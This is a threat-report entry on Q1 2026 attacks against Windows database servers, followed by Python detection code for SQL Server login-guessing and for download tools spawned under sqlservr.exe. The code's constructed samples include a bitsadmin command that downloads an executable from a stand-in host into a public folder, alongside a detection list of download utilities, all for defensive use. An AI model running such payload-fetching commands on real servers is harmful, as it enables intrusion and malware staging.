Q1 2026 Malware Statistics Report for Windows Database Servers
Essential information
- Published
- 14/04/2026 10:54
- Modified
- 14/04/2026 09:51
- Source / Author
- AlienVault
- Confidence
- 100/100
- Report type(s)
- threat-report
- Labels / Tags
- brute force clrshell coinminer credential stuffing database servers dictionary attack gh0strat ice cloud juicypotato loveminer ms-sql mykings mysql netcat scanner shadowforce
- Related entities
- 5 indicators, 5 observables, 1 intrusion sets (apt), 18 techniques (mitre), 9 malware, 1 others
Description
During the first quarter of 2026, Windows-based MS-SQL and MySQL database servers were attacked at a steady rate, with a temporary dip in February before attack volume rose again in March. The most active threat actor, Larva-26002, used utilities including BCP, curl, bitsadmin and PowerShell to download and execute a Go-based scanner named ICE Cloud. The scanner contains Turkish-language strings, has its scanning driven from a C&C server, and attempts MS-SQL authentication with a built-in list of credentials. The observed attacks were mainly brute-force and dictionary attacks against database logins, alongside exploitation of unpatched servers and of accounts left misconfigured through inadequate account management.
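The two observable sides of the pattern described above are the login-guessing phase (bursts of failed MS-SQL logins from one source) and the staging phase (download utilities launched under the SQL Server service process, for example through xp_cmdshell). The Python below is an added example, not code from the report or its author: it parses constructed SQL Server error log lines of the "Login failed for user" shape, separates a single-account password-guessing burst from a many-account spray, and walks a constructed process tree to find bitsadmin, curl, bcp or PowerShell with sqlservr.exe as an ancestor. All sample log lines, process IDs, hostnames (example.invalid) and the window/threshold figures are assumptions for illustration and are not values from the report.

```python
"""Detection helpers for the attack pattern in the report above (added example).
Sample inputs are constructed for illustration, not taken from the report."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Shape of a SQL Server error log entry for a failed login (error 18456);
# the trailing [CLIENT: ...] tag carries the source address.
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)

# Utilities named in the report for fetching and dropping the scanner.
DOWNLOAD_TOOLS = {"bitsadmin.exe", "curl.exe", "bcp.exe", "powershell.exe"}


def parse_failed_logins(lines):
    """Return (timestamp, login, client_ip) for every 'Login failed' line."""
    events = []
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["ip"]))
    return events


def classify_sources(events, window=timedelta(minutes=5), threshold=10):
    """Label each client IP that produces >= threshold failures inside a sliding
    window: 'brute_force' when the guesses hit one or few logins (password
    guessing / dictionary attack), 'credential_stuffing' when most attempts
    use a different login. Window and threshold are assumptions for this example."""
    by_ip = defaultdict(list)
    for ts, user, ip in sorted(events):
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, attempts in by_ip.items():
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            burst = attempts[start:end + 1]
            if len(burst) >= threshold:
                distinct_logins = len({u for _, u in burst})
                verdicts[ip] = ("credential_stuffing"
                                if distinct_logins > len(burst) // 2 else "brute_force")
                break
    return verdicts


def tools_spawned_under_sql_server(events):
    """events: process-creation records with pid, ppid, image, command_line
    (Sysmon event 1 style). Return the records for download tools whose
    ancestry leads back to sqlservr.exe, which covers the usual
    sqlservr.exe -> cmd.exe -> bitsadmin.exe chain produced by xp_cmdshell."""
    by_pid = {e["pid"]: e for e in events}
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    hits = []
    for e in events:
        if basename(e["image"]) not in DOWNLOAD_TOOLS:
            continue
        parent, seen = by_pid.get(e["ppid"]), set()
        while parent and parent["pid"] not in seen:
            seen.add(parent["pid"])
            if basename(parent["image"]) == "sqlservr.exe":
                hits.append(e)
                break
            parent = by_pid.get(parent["ppid"])
    return hits


def _failed_login_line(ts, user, ip):
    # Constructed sample line in the SQL Server error log format.
    return (f"{ts:%Y-%m-%d %H:%M:%S}.{ts.microsecond // 10000:02d} Logon       "
            f"Login failed for user '{user}'. Reason: Password did not match that for "
            f"the login provided. [CLIENT: {ip}]")


def sample_errorlog():
    """Constructed error log: one host guessing 'sa' repeatedly, one host spraying
    many logins, and two benign failures from an admin workstation."""
    base = datetime(2026, 3, 12, 10, 15, 0)
    lines = ["2026-03-12 10:14:58.10 Logon       Error: 18456, Severity: 14, State: 8."]
    lines += [_failed_login_line(base + timedelta(seconds=10 * i), "sa", "203.0.113.5")
              for i in range(12)]
    lines += [_failed_login_line(base + timedelta(seconds=7 * i), f"user{i:02d}", "198.51.100.7")
              for i in range(12)]
    lines += [_failed_login_line(base + timedelta(minutes=3, seconds=30 * i), "reportsvc", "192.0.2.9")
              for i in range(2)]
    return lines


def sample_process_events():
    """Constructed process tree: bitsadmin launched via cmd.exe under sqlservr.exe
    (should be flagged) and curl launched from explorer.exe (should not)."""
    return [
        {"pid": 1200, "ppid": 700, "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
         "command_line": "sqlservr.exe -sMSSQLSERVER"},
        {"pid": 4410, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
         "command_line": "cmd.exe /c bitsadmin /transfer job /download /priority high "
                         "http://example.invalid/a.exe C:\\Users\\Public\\a.exe"},
        {"pid": 4412, "ppid": 4410, "image": r"C:\Windows\System32\bitsadmin.exe",
         "command_line": "bitsadmin /transfer job /download /priority high "
                         "http://example.invalid/a.exe C:\\Users\\Public\\a.exe"},
        {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
        {"pid": 5100, "ppid": 900, "image": r"C:\Windows\System32\curl.exe",
         "command_line": "curl -o C:\\temp\\update.zip https://example.invalid/update.zip"},
    ]


if __name__ == "__main__":
    print(classify_sources(parse_failed_logins(sample_errorlog())))
    print([h["command_line"] for h in tools_spawned_under_sql_server(sample_process_events())])
```

On real hosts the error log lives under the instance's LOG directory (ERRORLOG) and the process records come from Sysmon or EDR telemetry; the brute-force rule should be tuned per environment, since busy application accounts with a rotated password can produce a short burst of failures from one source that the login-count logic alone does not distinguish from an attacker.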